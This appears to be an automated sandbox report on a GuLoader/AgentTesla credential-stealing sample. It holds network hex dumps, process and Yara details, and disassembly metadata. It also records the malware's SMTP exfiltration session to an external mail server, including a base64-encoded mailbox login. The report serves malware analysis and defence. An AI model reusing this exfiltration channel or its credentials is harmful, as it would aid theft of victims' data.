                                                          2021-10-13 15:10:52 UTC211INData Raw: e0 27 1f b7 5f 3e 34 07 63 6a 6a d0 63 68 6e 49 76 8f 87 7f 7d 63 c6 04 56 dd 5f cb 0e c1 59 ea e5 df 61 83 28 00 60 be ca b9 81 45 54 ef 36 59 b1 59 3b 87 6a 94 a6 4a 45 c1 ca da fc 3e 46 a1 13 a0 36 04 65 b5 ab 6a 13 c9 d2 f9 ab bd c1 bd 91 4e 1f 73 f2 ff d6 91 af ce 2f f3 02 91 78 a6 67 71 cf 1a f0 08 6d 39 22 fa 86 8b df 03 97 1f 5b db 94 90 a0 ec a7 82 12 6f bd 59 e2 32 34 7c c4 78 2d 2c 2c a7 cb 06 02 69 22 eb 96 cc d6 10 76 0f b4 a8 62 2c 74 d9 db db d2 04 7a 1a 3a 42 cb b5 62 89 e8 27 8b 8d b2 ac cb 2e ff 32 58 e6 1d b8 5b 34 31 4e 3e 43 d9 69 31 80 90 17 35 0b f8 49 92 b4 4d 98 1e f2 fc f5 d4 54 56 3a 57 1e 1b 18 13 b4 d0 9d 67 62 88 ca 13 36 3c 00 6f 85 e4 8a 04 2c 21 ef 40 d6 f4 c7 0c ee 27 56 5f 57 55 6e 92 5c 05 d9 ff a4 46 46 29 32 ac f2 9d
                                                          Data Ascii: '_>4cjjchnIv}cV_Ya(`ET6YY;jJE>F6ejNs/xgqm9"[oY24|x-,,i"vb,tz:Bb'.2X[41N>Ci15IMTV:Wgb6<o,!@'V_WUn\FF)2
                                                          2021-10-13 15:10:52 UTC212INData Raw: 09 43 ca c1 c9 a6 46 5f 82 3c 7e 97 0c e4 6f 50 ab 94 58 18 52 9b ee d9 91 ef 25 d4 81 f3 c3 e5 ba 5e a2 7e df 47 e0 4c 8e 7e 91 f6 84 54 12 a4 f0 da 5a 0f 87 d3 f0 4e 8b 08 cc ee b2 66 ad c3 54 f3 68 7c cd 6a 10 29 c8 28 a1 84 3e 2e 2a 3f 66 57 3f 9d 66 90 82 1d 7e 5a a2 c2 dd 3a 92 78 5b c2 f1 39 3a 4f 20 b4 37 6a cf ed 82 3f 15 3c f1 c0 50 8a cd a0 ff c0 8e 80 0d 36 bd 21 fc b1 67 92 37 23 6b 52 c3 38 9b 9f 4b 81 46 ac 25 6d bf b4 49 1d 3b d8 57 1f 4d 98 6e 40 81 13 36 2c 06 f2 68 32 13 d1 2f c6 2e 33 12 04 6c 0c 8e 75 8f 73 7e e5 2b e3 70 9d a3 0d 5a e2 30 2c 5c 7a d5 df 9d 30 bd b6 41 b5 06 69 44 a8 e2 93 3b a9 5b 37 cd 3f bb ca ba 63 e9 29 f1 38 1e 07 59 7a 3a 48 c8 66 22 16 20 32 46 44 0f 7e ee aa a9 c0 6f b6 a5 d8 bb dd 9a 99 b0 81 f4 ce 53 8b 73
                                                          Data Ascii: CF_<~oPXR%^~GL~TZNfTh|j)(>.*?fW?f~Z:x[9:O 7j?<P6!g7#kR8KF%mI;WMn@6,h2/.3lus~+pZ0,\z0AiD;[7?c)8Yz:Hf" 2FD~oSs
                                                          2021-10-13 15:10:52 UTC214INData Raw: 59 11 20 50 4c 3d e6 ee 1b 15 ab a5 8e a6 a0 24 7a 6f 21 7e d5 02 fe f8 37 c1 77 4b ec 4e 47 21 84 76 05 04 50 7e d3 ac 8d 66 33 18 b9 5a 25 3d 1c f4 65 f4 dc 7c 63 61 cd 3e 82 87 7e 75 77 58 0c 50 ce 5e dd 0c c1 4c f8 7b d7 7e 88 27 84 28 be ee 39 92 44 54 ef 34 4a a9 4e a5 b0 f5 b8 a7 5d 3e b5 dd 45 c9 3e 5f a1 14 af 36 07 76 26 14 42 10 f4 d6 f4 bd 39 e5 bd ad 53 11 ec d3 ea f4 9a bc cb 34 f7 16 8b 41 a8 7e 70 d7 09 e8 07 5d 37 13 7a be 81 c1 60 9e 1f 5b c5 91 9e bd e0 a8 8f 3b 6d b8 49 f8 bb 99 78 d6 fb 68 37 36 23 6e 06 0d ed 6c e2 8d c1 c9 98 f7 08 b2 a7 e4 22 75 d4 db d0 d3 1d 7b 0d b5 1e c5 c1 6f 86 69 27 85 12 b7 ac d4 2e e1 28 44 f9 0d 38 9c 39 3a 46 38 5c d1 78 b2 38 94 03 b4 49 f1 47 01 24 4a 8a 9d af f1 e7 d4 4f 5f 37 58 99 0b 13 09 3d 90 97
                                                          Data Ascii: Y PL=$zo!~7wKNG!vP~f3Z%=e|ca>~uwXP^L{~'(9DT4JN]>E>_6v&B9S4A~p]7z`[;mIxh76#nl"u{oi'.(D89:F8\x8IG$JO_7X=
                                                          2021-10-13 15:10:52 UTC215INData Raw: c8 05 a4 71 b7 90 61 6e 55 32 eb 3a d7 15 6f 75 29 49 f6 4e 5c f8 68 6d 3a a8 a0 e6 df d0 a9 3c ab 9e b7 70 e5 6c 8f 0f 2a 8b 4b d7 dd d7 07 05 58 11 18 de 14 1b 77 ad f4 97 96 79 17 42 0a 99 cd 1d 36 31 45 3e 49 cc e9 ac 42 3d df de 49 dd 45 9b 64 0e 5b 85 5b 19 ab 79 97 55 86 ca d3 e7 27 81 01 ca f1 bf 63 ad d3 d7 b8 7c 52 c0 6d 17 b9 58 8f ae 98 b1 60 2a 2c 7d 4b b0 2d 76 00 ba 5f 7e 5a a4 c2 dd 39 af 7d 46 cd 76 91 3d 54 32 26 76 7f b3 f7 08 80 10 3a f1 c5 7e 84 d0 bf 75 71 97 94 01 39 ae a4 d4 ae f8 2e 28 28 78 5f d6 b8 04 03 0b 8e c3 5a bd 4f a8 bf 4e 66 be c9 57 0d 5e 93 7d 58 9e 1a 30 37 1f 6d d2 22 9f 56 29 c6 25 28 96 40 70 6b 85 47 e6 7c f3 a2 21 c0 74 9b b0 06 40 ed 28 3a 46 fe 50 df 92 30 b0 a0 c4 0a 08 08 52 29 4e 89 15 87 4e bf 19 23 3f 4f
                                                          Data Ascii: qanU2:ou)IN\hm:<pl*KXwyB61E>IB=IEd[[yU'c|RmX`*,}K-v_~Z9}Fv=T2&v:~uq9.((x_ZONfW^}X07m"V)%(@pkG|!t@(:FP0R)NN#?O
                                                          2021-10-13 15:10:52 UTC216INData Raw: 2f 65 bb 8d 25 79 ae 0c c3 8b 6f ce b6 f7 57 32 20 2a 22 4f 9c 94 8a f8 68 06 e9 bb 11 87 cc a4 e2 42 cd b0 55 1b 83 18 f8 6e 10 0d 43 5c b1 51 fd 94 39 a8 a6 d6 b5 2f 63 79 7e 34 fe 6a 08 f3 c2 b6 8b 7a 58 ec 4c 66 27 8f 64 84 44 5f 58 d3 b9 9f e1 3d 1a aa 5a 32 d3 16 e1 77 73 d3 6f ed ef 48 3e 89 a7 7e 64 66 d9 01 52 d9 5e ca 0d c8 5d e9 e8 da 7c 82 3a 05 68 ba ca c9 81 45 40 ec 3e 4b b4 4b bd a2 87 91 bb 4d 51 af da 5e de 26 45 a1 07 26 ba 00 62 b9 38 df bd ef d4 fc b2 37 f0 b0 b5 6e 0c f9 c7 fa f1 98 b0 c1 3a fe 16 84 71 ae 6b 64 c2 02 d5 17 62 39 3b 7c 9f 8e de 6f 90 18 5a d3 9f 98 a8 ed a5 a7 0d 61 a8 54 ff 3d 2c 72 c3 72 35 28 2c a8 d7 0d 03 64 2b fd 12 46 cf 98 e2 05 b8 95 64 23 62 d7 c6 dc de 82 ee 0e b7 d7 c6 2b ee 9d 6a 3b 91 1e 28 38 cc 35 f2
                                                          Data Ascii: /e%yoW2 *"OhBUnC\Q9/cy~4jzXLf'dD_X=Z2wsoH>~dfR^]|:hE@>KKMQ^&E&b87n:qkdb9;|oZaT=,rr5(,d+Fd#b+j;(85
                                                          2021-10-13 15:10:52 UTC217INData Raw: 0e d1 33 4a 62 25 7a 9b 5a 2a bb eb e3 6f ed 81 cc 23 d1 62 d6 52 69 0b 1d e9 82 bf 75 bb c3 a7 22 aa ad 64 94 2c d4 23 1c c4 0b 38 87 3a a7 60 61 5e 22 77 d0 d7 14 cb 61 3f 4b fd 52 d4 14 72 ef e7 a8 b0 68 98 c7 d1 b4 5a 84 2a 9a ea f0 47 01 b7 6d 4b c3 c1 c7 94 c5 a9 0e 88 ef ec 01 f1 ef eb 37 76 6a 99 b7 86 6c df 8f 4f c4 d4 83 83 da 7d 5b 4e 28 d0 c1 53 40 a1 94 ec e2 58 ad 57 03 36 9d 8e c8 66 cc d5 fb 48 8e 0b d0 6c 5b 6e bd f1 d0 a4 f2 97 d6 ff ea a5 cb aa 7a 9b b1 69 2a 2a 6f 5b 23 08 9b 00 bb f3 62 53 a6 c2 dd 3f ba 76 53 de 7d 82 3b 54 3d a9 3e 70 d4 f6 20 8e 16 23 7f 23 7e 84 d6 b9 7a 7f 85 9a 05 2f b4 2e c1 a7 f7 23 20 3f e4 ff c5 28 09 f2 1b 81 47 ed 3e 78 35 56 5b 05 b0 db d4 94 41 91 67 57 86 14 3f 30 06 f1 98 39 0f 5f cb dd 20 38 12 1c 67
                                                          Data Ascii: 3Jb%zZ*o#bRiu"d,#8:`a^"wa?KRrhZ*GmK7vjlO}[N(S@XW6fHl[nzi**o[#bS?vS};T=>p ##~z/.# ?(G>x5V[AgW?09_ 8g
                                                          2021-10-13 15:10:52 UTC219INData Raw: 97 a8 e8 10 37 2e 0d 19 47 4c 59 45 b9 11 b1 7a 7b f6 36 7d ba 9d 28 fb a5 e9 03 56 7a 81 0a c5 cd bd 66 de 8f b2 c8 a9 7f af 6f a8 bf a5 dd be 83 c9 8e 60 c2 ab e6 de 9f 2f 30 ab 49 9c 96 a2 f0 7e 13 48 1c 18 9b 5c 2f 6c 60 ca bb 45 0e 03 ac 78 45 9e 25 66 5a b0 4d 6d bc 0e ab a6 36 a1 ab 2f 61 fb 3b ed e1 04 f8 f7 b3 89 63 5b f5 d1 fb 36 9b e5 35 45 49 df db be bf e7 28 9b 03 54 2a 3b 35 e3 65 f6 7c 76 65 7b 59 6f 08 16 7f 72 e7 d3 04 7a dd 4f 4f 09 c2 71 e9 ed c8 fd 23 34 17 e9 b2 ca 3f 93 c7 05 e3 1e 40 b5 59 3b e7 6a 94 a6 4a 5f a2 df 5e dd 3e 46 a1 13 ae 1e 0d 67 ae 28 57 1f f9 d2 fa a4 3f e8 a6 b1 50 0d f7 ef f5 eb 97 ba c5 3e 85 0a f1 74 c7 63 59 ca 36 f5 27 68 27 34 76 a2 8a c1 60 8b 03 57 d0 89 8c bd f9 bd 85 07 62 bc 41 f6 32 38 79 c5 7f 34 27
                                                          Data Ascii: 7.GLYEz{6}(Vzfo`/0I~H\/l`ExE%fZMm6/a;c[65EI(T*;5e|ve{YorzOOq#4?@Y;jJ_^>Fg(W?P>tcY6'h'4v`WbA28y4'
                                                          2021-10-13 15:10:52 UTC220INData Raw: c4 60 fe 45 67 64 f6 cb 0b 3f a9 a7 57 fe ca 41 86 6f 4e f6 28 0a 4b ec ff c4 2b c4 a9 7e 51 85 51 3f 64 b0 5e f9 e4 89 ed 8f 74 32 58 e2 c9 7c 9c 5e 23 b3 e3 eb 69 ed 80 de a2 54 6a da 55 6d 19 9d 0d 90 3f a0 a9 43 43 2a af ad 64 86 ac 30 24 1c c6 19 b8 63 34 a9 69 66 5d 30 f7 34 c5 94 2f 6b 35 5b fe 40 54 d0 60 6f b2 be b2 67 9f fa c0 34 23 96 aa 7e f8 70 92 13 37 89 43 ca c1 c5 86 44 4d 01 99 6f 15 59 f6 ed 79 b7 92 78 19 53 8a 6c dc 9d cf 20 c6 03 56 ca fd a3 4c 20 d7 ab 41 c0 cd 86 6c 13 53 8d 53 11 b6 71 9f 48 8e c2 db f4 4e 89 09 c2 ec 37 66 ad d1 d5 b6 72 7b c7 7f 02 ab d9 2a af 8a 30 20 25 22 68 59 31 88 e7 12 3b 1f d0 d4 a9 df af 33 b2 78 4e d0 73 8c 38 5c 20 a7 16 ee d9 ff ea 8b 17 32 ff cb 70 8a d8 b1 7d 79 f0 91 39 25 bc 26 bf a0 b6 2b 6a 2d
                                                          Data Ascii: `Egd?WAoN(K+~QQ?d^t2X|^#iTjUm?CC*d0$c4if]04/k5[@T`og4#~p7CDMoYyxSl VL AlSSqHN7fr{*0 %"hY1;3xNs8\ 2p}y9%&+j-
                                                          2021-10-13 15:10:52 UTC221INData Raw: 16 8c c1 43 e2 84 a1 27 40 34 42 7c 04 25 a2 87 e0 fc 60 2b 0f 2d d0 fa b5 bb e9 a9 11 20 b6 62 4c 8e 69 29 13 79 34 fb 0b 36 9c c0 44 44 49 ff 65 13 27 3b 2c 96 9d bf 42 64 97 45 0e d6 f6 5f 85 5d 72 0f 4e fb 89 0c c2 cf ac e7 da 87 b7 e8 a9 6e 2e 6b ae 9f a4 dc af 02 cd 85 67 c0 be f4 5f 3a 2e 22 2a 41 94 9c 82 f0 6b 01 c9 b9 19 89 dd 27 67 40 cb ba 50 1c 82 09 79 57 1f 2d 45 5d bf 5f ec 15 00 b9 27 9f a4 ae 2a 73 7a 33 fc 60 00 f0 ea b6 81 7e 5e fd cc fe 23 8a 64 84 44 5b 5e d3 b9 9f e5 3a 1a aa 5a 36 3c 15 e1 77 77 d5 7e 6d 73 4c 7e 89 a7 7e 60 66 db 01 52 dd 5e ce 0d c8 59 e9 f8 da 7c 86 35 05 68 ba ce 39 81 45 40 e8 3e 44 b4 4b b9 a2 77 91 bb 4f 57 a8 d8 58 d5 23 43 bc 16 a6 16 05 64 a4 29 5f 15 e9 d3 f8 ba 3f f8 b8 b1 4e 0d f1 cf f7 f6 92 b2 cb 32
                                                          Data Ascii: C'@4B|%`+- bLi)y46DDIe';,BdE_]rNn.kg_:."*Ak'g@PyW-E]_'*sz3`~^#dD[^:Z6<ww~msL~~`fR^Y|5h9E@>DKwOWX#Cd)_?N2


                                                          SMTP Packets

                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                          Oct 13, 2021 17:12:29.503778934 CEST58749766132.148.164.170192.168.11.20220-ip-132-148-164-170.ip.secureserver.net ESMTP Exim 4.94.2 #2 Wed, 13 Oct 2021 08:12:29 -0700
                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                          220 and/or bulk e-mail.
                                                          Oct 13, 2021 17:12:29.504885912 CEST49766587192.168.11.20132.148.164.170EHLO 536720
                                                          Oct 13, 2021 17:12:29.641139984 CEST58749766132.148.164.170192.168.11.20250-ip-132-148-164-170.ip.secureserver.net Hello 536720 [102.129.143.96]
                                                          250-SIZE 52428800
                                                          250-8BITMIME
                                                          250-PIPELINING
                                                          250-PIPE_CONNECT
                                                          250-AUTH PLAIN LOGIN
                                                          250-STARTTLS
                                                          250 HELP
                                                          Oct 13, 2021 17:12:29.642463923 CEST49766587192.168.11.20132.148.164.170AUTH login c2FsZXNAYmluYXJ5aW5mb3RlY2guY29t
                                                          Oct 13, 2021 17:12:29.778268099 CEST58749766132.148.164.170192.168.11.20334 UGFzc3dvcmQ6
                                                          Oct 13, 2021 17:12:29.976290941 CEST58749766132.148.164.170192.168.11.20235 Authentication succeeded
                                                          Oct 13, 2021 17:12:29.977415085 CEST49766587192.168.11.20132.148.164.170MAIL FROM:<sales@binaryinfotech.com>
                                                          Oct 13, 2021 17:12:30.111505985 CEST58749766132.148.164.170192.168.11.20250 OK
                                                          Oct 13, 2021 17:12:30.111851931 CEST49766587192.168.11.20132.148.164.170RCPT TO:<sales@binaryinfotech.com>
                                                          Oct 13, 2021 17:12:30.248964071 CEST58749766132.148.164.170192.168.11.20250 Accepted
                                                          Oct 13, 2021 17:12:30.249249935 CEST49766587192.168.11.20132.148.164.170DATA
                                                          Oct 13, 2021 17:12:30.383560896 CEST58749766132.148.164.170192.168.11.20354 Enter message, ending with "." on a line by itself
                                                          Oct 13, 2021 17:12:30.385380030 CEST49766587192.168.11.20132.148.164.170.
                                                          Oct 13, 2021 17:12:30.537480116 CEST58749766132.148.164.170192.168.11.20250 OK id=1mafvj-0003n3-Fj
                                                          Oct 13, 2021 17:14:08.745807886 CEST49766587192.168.11.20132.148.164.170QUIT
                                                          Oct 13, 2021 17:14:08.910492897 CEST58749766132.148.164.170192.168.11.20221 ip-132-148-164-170.ip.secureserver.net closing connection

                                                          Code Manipulations

                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          Analysis Process: DOC 13102021.exe PID: 8804 Parent PID: 8924

                                                          General

                                                          Start time:17:09:27
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\Desktop\DOC 13102021.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\DOC 13102021.exe'
                                                          Imagebase:0x400000
                                                          File size:139264 bytes
                                                          MD5 hash:31851BAC3685C5641FC16E256C94C4A8
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:Visual Basic
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1441695522.0000000002200000.00000040.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          Chronological Activities

                                                          Analysis Process: RegAsm.exe PID: 2588 Parent PID: 8804

                                                          General

                                                          Start time:17:10:08
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\Desktop\DOC 13102021.exe'
                                                          Imagebase:0x6b0000
                                                          File size:65440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.5658064562.000000001DB31000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 2604 Parent PID: 2588

                                                          General

                                                          Start time:17:10:08
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6830f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: tKZVPq.exe PID: 7824 Parent PID: 4412

                                                          General

                                                          Start time:17:11:21
                                                          Start date:13/10/2021
                                                          Path:C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:'C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe'
                                                          Imagebase:0xf70000
                                                          File size:65440 bytes
                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:.Net C# or VB.NET
                                                          Antivirus matches:
                                                          • Detection: 0%, Metadefender, Browse
                                                          • Detection: 0%, ReversingLabs
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Analysis Process: conhost.exe PID: 7176 Parent PID: 7824

                                                          General

                                                          Start time:17:11:22
                                                          Start date:13/10/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6830f0000
                                                          File size:875008 bytes
                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          Chronological Activities

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >

                                                            Analysis Process: DOC 13102021.exe PID: 8804 Parent PID: 8924 DOC 13102021.exeCOMMON

                                                            Executed Functions

                                                            Function 00401868, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 866COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: #100
                                                            • String ID: VB5!6&*
                                                            • API String ID: 1341478452-3593831657
                                                            • Opcode ID: f300bb2727de39dcb60b1d22bcee05501c1ff40e41e79223ea62daa622ee5881
                                                            • Instruction ID: fd6e2bd0fed8b2f11dd40edf5a1729cc514126353edd81132c1970d2d0b328eb
                                                            • Opcode Fuzzy Hash: f300bb2727de39dcb60b1d22bcee05501c1ff40e41e79223ea62daa622ee5881
                                                            • Instruction Fuzzy Hash: 5152DE7144E3C18FD7138B709DA65A17FB0EE1331471D45EBC8C18F0A3E229696AC7A6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004022D6, Relevance: 3.7, APIs: 1, Instructions: 2477memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 527c03e96505490303761c4a8a3d0a3832f769113de7ac330f1ba9281de692a3
                                                            • Instruction ID: 7f0d35f01e7f721a00db089bbb3390e97e22e3f14d73f91d56e91ba8931f9991
                                                            • Opcode Fuzzy Hash: 527c03e96505490303761c4a8a3d0a3832f769113de7ac330f1ba9281de692a3
                                                            • Instruction Fuzzy Hash: 4403963678A3829BCF4A4E75D0A04F2BFE1AE7B62433C78ACD0E556163D776441ACB05
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040323D, Relevance: 1.9, APIs: 1, Instructions: 602memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 06685170cc3c31699edd222fbe2f375f2f078cafe08f46e7a6f67f45a6225d42
                                                            • Instruction ID: f56804be0460f9d6e6e34cc483b6d981a489092f8e9c4e245dda8dbfc86c4667
                                                            • Opcode Fuzzy Hash: 06685170cc3c31699edd222fbe2f375f2f078cafe08f46e7a6f67f45a6225d42
                                                            • Instruction Fuzzy Hash: 51C15B22B0A7000B8B5D88BE54D0967C4D79BEF221369E53D252EF73A5EDB9CD4B124C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004031DE, Relevance: 1.8, APIs: 1, Instructions: 582memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 23f02a79179efd38c69f2c5c6ba3a7887115faf996e1123b9667ab916dc55229
                                                            • Instruction ID: caf683d9b3f3693e3fe7daacdcff81bad0529c0920e59d4dfdfb2ab9f7d702cb
                                                            • Opcode Fuzzy Hash: 23f02a79179efd38c69f2c5c6ba3a7887115faf996e1123b9667ab916dc55229
                                                            • Instruction Fuzzy Hash: 36D16B22B0A7000B8B5D88BE54D0967C4D79BEF221369E53D252EF73A9EDB9CD4B114C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004032BE, Relevance: 1.8, APIs: 1, Instructions: 567memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 84179b95e11334c9fb29194cba6a32f21e15f766444e359ee321281d0ddcf2dd
                                                            • Instruction ID: 3032b4646570f1fdcfc21fe8136af04755ebb90a86d36eb7ca504fa09b046701
                                                            • Opcode Fuzzy Hash: 84179b95e11334c9fb29194cba6a32f21e15f766444e359ee321281d0ddcf2dd
                                                            • Instruction Fuzzy Hash: DEB16D22B0A3000B875D98BE54D0967C4D79FEF221269E63D252EF73A5EDB9CD4B1148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040334C, Relevance: 1.8, APIs: 1, Instructions: 538memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 12600ea806d86b02f8fe2ecb2630692762fca358d3bac09461c5f679b88658b5
                                                            • Instruction ID: 8d0f08a9ed8dbb843890ab556344016800b463c5619133a83515aa6c60371fb0
                                                            • Opcode Fuzzy Hash: 12600ea806d86b02f8fe2ecb2630692762fca358d3bac09461c5f679b88658b5
                                                            • Instruction Fuzzy Hash: 8BB16E22B1A3000B875D98BE54D0967C4C79FEF22136AE63D252EF73A5EDB9CD4B1148
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004033D5, Relevance: 1.7, APIs: 1, Instructions: 474memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440669840.000000000041D000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 3576f89adf287c43544b1332bc10ccd0a4b6739c01269b56e599e3eb31b522be
                                                            • Instruction ID: 1a1ad9e1730836a0e51da9c0f4963aac657c652d2c6292443c481d02885ba444
                                                            • Opcode Fuzzy Hash: 3576f89adf287c43544b1332bc10ccd0a4b6739c01269b56e599e3eb31b522be
                                                            • Instruction Fuzzy Hash: 45A15D22B193000B875D98BE54D0967C4D79FEF22136AE63D252EF73A5EDB9CD4B0248
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00403455, Relevance: 1.7, APIs: 1, Instructions: 444memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,00011000,6B2F2CEC,53BBC7CB), ref: 0040385F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1440460131.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1440419761.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1440639316.000000000041C000.00000004.00020000.sdmp Download File
